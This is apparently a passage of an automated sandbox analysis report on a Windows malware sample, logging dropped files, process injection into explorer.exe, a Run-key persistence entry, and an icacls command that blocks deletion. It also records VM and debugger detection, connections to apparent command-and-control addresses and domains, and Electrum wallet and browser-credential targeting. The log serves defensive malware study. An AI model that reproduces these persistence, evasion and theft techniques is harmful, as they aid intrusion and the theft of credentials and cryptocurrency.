Source: C:\Users\user\AppData\Local\Temp\3046.exe Unpacked PE file: 15.2.3046.exe.400000.0.unpack
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\4113.exe Unpacked PE file: 11.2.4113.exe.400000.0.unpack .text:ER;.data:W;.guno:R;.jofolo:R;.nabog:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\3046.exe Unpacked PE file: 15.2.3046.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\E4.exe Unpacked PE file: 17.2.E4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\ECFB.exe Unpacked PE file: 18.2.ECFB.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BA11 push ecx; ret 0_2_0040BA24
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00932DC0 push 6700D42Eh; retf 0_2_00932DCA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00931F68 push 623D8A45h; retf 0_2_00931F6D
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004363BD push esi; ret 11_2_004363C6
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004139F8 push ecx; ret 11_2_00413A0B
Source: 4113.exe.4.dr Static PE information: section name: .guno
Source: 4113.exe.4.dr Static PE information: section name: .jofolo
Source: 4113.exe.4.dr Static PE information: section name: .nabog
Source: 98D7.exe.4.dr Static PE information: section name: _RDATA
Source: 98D7.exe.4.dr Static PE information: section name: .vmp0
Source: 98D7.exe.4.dr Static PE information: section name: .vmp1
Source: llpb1133.exe.14.dr Static PE information: section name: _RDATA
Source: llpb1133.exe.14.dr Static PE information: section name: .vmp0
Source: llpb1133.exe.14.dr Static PE information: section name: .vmp1
Source: XandETC.exe.14.dr Static PE information: section name: .xdata
Source: nss3.dll.19.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.19.dr Static PE information: section name: .didat
Source: mozglue.dll.19.dr Static PE information: section name: .00cfg
Source: freebl3.dll.19.dr Static PE information: section name: .00cfg
Source: softokn3.dll.19.dr Static PE information: section name: .00cfg
Source: sqlite3.dll.19.dr Static PE information: section name: /4
Source: sqlite3.dll.19.dr Static PE information: section name: /19
Source: sqlite3.dll.19.dr Static PE information: section name: /31
Source: sqlite3.dll.19.dr Static PE information: section name: /45
Source: sqlite3.dll.19.dr Static PE information: section name: /57
Source: sqlite3.dll.19.dr Static PE information: section name: /70
Source: sqlite3.dll.19.dr Static PE information: section name: /81
Source: sqlite3.dll.19.dr Static PE information: section name: /92
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
Source: 98D7.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x383f10
Source: pliu.exe.14.dr Static PE information: real checksum: 0x2b520 should be: 0x29e17
Source: A33B.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x76ad5c
Source: llpb1133.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x383f10

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\pliu.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\jhevwvt
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\sievwvt
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3046.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\98D7.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E4.exe
Source: C:\Users\user\AppData\Local\Temp\A33B.exe File created: C:\Users\user\AppData\Local\Temp\llpb1133.exe
Source: C:\Users\user\AppData\Local\Temp\A33B.exe File created: C:\Users\user\AppData\Local\Temp\pliu.exe
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\freebl3.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\D8D3.exe
Source: C:\Users\user\AppData\Local\Temp\pliu.exe File created: C:\Users\user\AppData\Local\Temp\db.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\FB61.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\ECFB.exe
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\A33B.exe File created: C:\Users\user\AppData\Local\Temp\XandETC.exe
Source: C:\Users\user\AppData\Local\Temp\3046.exe File created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\12C0.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\4113.exe
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\mozglue.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A33B.exe
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\3046.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\sievwvt:Zone.Identifier read attributes | delete
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\jhevwvt:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\pliu.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: file.exe, 00000000.00000002.313456066.0000000000939000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Source: C:\Users\user\AppData\Local\Temp\98D7.exe RDTSC instruction interceptor: First address: 00000001405FFCC5 second address: 00000001405FFCCC instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 rcr edx, 6Dh 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\98D7.exe RDTSC instruction interceptor: First address: 00000001405FFCCC second address: 00000001405FFCE7 instructions: 0x00000000 rdtsc 0x00000002 rcl dl, cl 0x00000004 ror cl, 1 0x00000006 mov dx, 05D0h 0x0000000a movzx ax, bl 0x0000000e sub cl, FFFFFFCCh 0x00000011 clc 0x00000012 neg cl 0x00000014 inc eax 0x00000015 xor bh, cl 0x00000017 setl dl 0x0000001a lahf 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe RDTSC instruction interceptor: First address: 00000001405FFCC5 second address: 00000001405FFCCC instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 rcr edx, 6Dh 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe RDTSC instruction interceptor: First address: 00000001405FFCCC second address: 00000001405FFCE7 instructions: 0x00000000 rdtsc 0x00000002 rcl dl, cl 0x00000004 ror cl, 1 0x00000006 mov dx, 05D0h 0x0000000a movzx ax, bl 0x0000000e sub cl, FFFFFFCCh 0x00000011 clc 0x00000012 neg cl 0x00000014 inc eax 0x00000015 xor bh, cl 0x00000017 setl dl 0x0000001a lahf 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\E4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\explorer.exe TID: 3568 Thread sleep time: -450000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\A33B.exe TID: 2992 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\98D7.exe TID: 5164 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\pliu.exe TID: 3516 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\pliu.exe TID: 4604 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\98D7.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 410
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 447
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 855
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 842
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\pliu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\db.dll
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FB61.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\12C0.exe
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 98D7.exe, 00000010.00000002.602257740.00000000004F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iueg.aappatey.comiueg.aappatey.
Source: 98D7.exe, 00000010.00000003.431710822.000000000051E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rRM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6Y@sRHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s
Source: explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: 98D7.exe, 00000010.00000003.461580588.0000000000519000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.461569848.0000000000516000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkqej
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441951171.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.290527943.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000004.00000000.302351871.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000004.00000000.285953189.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: 98D7.exe, 00000010.00000003.480306540.0000000000513000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000513000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: explorer.exe, 00000004.00000000.302351871.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: 98D7.exe, 00000010.00000003.431710822.000000000051E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: M8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6Y@sR
Source: llpb1133.exe, 00000014.00000003.520897937.00000000004A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\explorer.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00428390 FindFirstFileExW, 11_2_00428390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0092B91D push dword ptr fs:[00000030h] 0_2_0092B91D
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0041E1B1 mov ecx, dword ptr fs:[00000030h] 11_2_0041E1B1
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0042950B mov eax, dword ptr fs:[00000030h] 11_2_0042950B
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00413DCA
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0042BCAF GetProcessHeap, 11_2_0042BCAF
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00414035 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00414035
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00413DCA
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00417E53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00417E53
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00413F2C SetUnhandledExceptionFilter, 11_2_00413F2C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 37.34.248.24 80
Source: C:\Windows\explorer.exe Domain query: perficut.at
Source: C:\Windows\explorer.exe Domain query: potunulit.org
Source: C:\Windows\explorer.exe Network Connect: 190.219.54.242 80
Source: C:\Windows\explorer.exe Network Connect: 23.106.124.133 80
Source: C:\Windows\explorer.exe Network Connect: 195.158.3.162 80
Source: C:\Windows\explorer.exe Network Connect: 158.69.96.67 443
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80
Source: C:\Windows\explorer.exe Network Connect: 77.73.134.27 80
Source: C:\Windows\explorer.exe Domain query: flytourchip.com.br
Source: C:\Windows\explorer.exe File created: D8D3.exe.4.dr
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\E4.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\E4.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\3046.exe Memory written: C:\Users\user\AppData\Local\Temp\3046.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Memory written: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 5791B14
Source: C:\Users\user\AppData\Local\Temp\E4.exe Thread created: unknown EIP: 58A19A0
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Section unmapped: unknown base address: 400000
Source: C:\Users\user\AppData\Local\Temp\3046.exe Section unmapped: unknown base address: 400000
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe"
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: unknown unknown
Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.290368021.0000000006770000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.284034500.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 11_2_0042B0E9
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: EnumSystemLocalesW, 11_2_0042B3D6
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: EnumSystemLocalesW, 11_2_0042B38B
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: EnumSystemLocalesW, 11_2_0042B471
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetLocaleInfoW, 11_2_00423431
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 11_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetLocaleInfoW, 11_2_0042B74F
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 11_2_0042B878
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetLocaleInfoW, 11_2_0042B97E
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 11_2_0042BA4D
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: EnumSystemLocalesW, 11_2_00422F0B
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Queries volume information: C:\Users\user\AppData\Local\Temp\A33B.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00413A75 cpuid 11_2_00413A75
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00413CC0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 11_2_00413CC0
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004041D0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA, 11_2_004041D0

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.464907460.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.464370990.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.462319085.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.464693455.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.441770993.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.446299900.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: D8D3.exe PID: 5128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: llpb1133.exe PID: 2560, type: MEMORYSTR
Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: wlts_electrum:Electrum;26;Electrum\wallets;*;-
